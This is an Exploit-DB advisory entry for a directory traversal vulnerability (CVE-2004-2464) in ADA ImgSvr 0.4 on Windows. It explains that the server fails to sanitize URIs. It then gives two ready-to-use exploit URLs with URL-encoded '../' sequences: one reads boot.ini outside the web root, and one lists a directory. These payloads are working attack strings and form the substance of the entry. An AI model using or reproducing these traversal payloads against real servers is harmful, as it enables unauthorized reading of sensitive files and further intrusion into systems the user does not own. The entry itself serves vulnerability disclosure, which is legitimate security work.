ada imgsvr 0.4 - Directory Traversal Vulnerability

2004-04-05T00:00:00
ID EDB-ID:23909
Type exploitdb
Reporter dr_insane
Modified 2004-04-05T00:00:00

Description

ADA IMGSVR 0.4 Directory Traversal Vulnerability. CVE-2004-2464. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/10048/info

ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.

A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system. 

To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini

To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/